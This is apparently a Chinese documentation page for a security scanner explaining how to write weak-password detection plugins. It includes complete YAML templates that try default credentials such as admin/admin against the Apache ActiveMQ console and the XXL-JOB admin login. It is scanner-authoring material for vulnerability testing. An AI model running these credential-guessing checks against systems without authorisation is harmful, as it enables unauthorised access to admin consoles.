写弱口令插件需要注意,需要将一些默认的口令放置于payloads中,以便程序可以在后续做一些便捷的替换

务必在爆破前先写一个check rule检查页面是否可爆破(否则会导致发大量无效的登录包)

默认模版:

name: poc-yaml-activemq-weak-password
manual: true
transport: http
payloads:
  # payloads中写默认口令
  payloads:
    p1:
      username: r"admin"   # 用户名的键必须为username
      password: r"admin"   # 密码的键必须为password
      auth: base64(username + ":" + password)   # 这里键名任意
rules:
  check:
    request:
      cache: true   # check页面只需要访问一次,所以cache为true
      method: GET
      path: /admin/
    expression: response.status == 401 && response.body.bcontains(b"Unauthorized")
  auth:
    request:
      cache: false  # 密码爆破不需要使用缓存 
      method: GET
      path: /admin/
      headers:
        Authorization: Basic {{auth}}
    expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
expression: check() && auth()
detail:
  author: test
  links:
    - https://blog.csdn.net/ge00111/article/details/72765210

另外还需要考虑WebContext子目录的问题,比如xxljob有可能部署在子目录/xxl-job-admin下,需要在认证前判定该路径是否存在

name: poc-yaml-xxljob-tologin-weak-password
manual: true
transport: http
payloads:
  payloads:
    p1:
      username: r"admin"
      password: r"admin"
    p2:
      username: r"admin"
      password: r"123456"
rules:
  check_0:
    request:
      cache: true
      method: GET
      path: /toLogin
    expression: response.body_string.contains("<a><b>XXL</b>JOB</a>")
  auth_0:
    request:
      cache: false
      method: POST
      path: /login
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: userName={{username}}&password={{password}}
    expression: response.status == 200 && response.body_string.contains('"code":200,')
  check_1:
    request:
      cache: true
      method: GET
      path: /xxl-job-admin/toLogin
    expression: response.body_string.contains("<a><b>XXL</b>JOB</a>")
  auth_1:
    request:
      cache: false
      method: POST
      path: /xxl-job-admin/login
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: userName={{username}}&password={{password}}
    expression: response.status == 200 && response.body_string.contains('"code":200,')
expression: check_0() && auth_0() || check_1() && auth_1()
detail:
  author: Chaitin
  links:
    - https://blog.csdn.net/dsl59741/article/details/106686942

Was this page helpful?

XSS常见问题